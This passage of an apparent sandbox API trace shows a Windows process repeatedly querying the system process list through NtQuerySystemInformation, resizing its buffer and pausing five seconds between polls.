ResultLength=0x0) returned 0xc0000004 [0281.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.924] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.933] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.942] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.952] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.961] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.973] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.983] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.994] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.002] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.011] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.020] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.030] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.040] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.050] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.059] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.068] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.077] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.097] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.148] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.159] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.160] NtAllocateVirtualMemory (in: 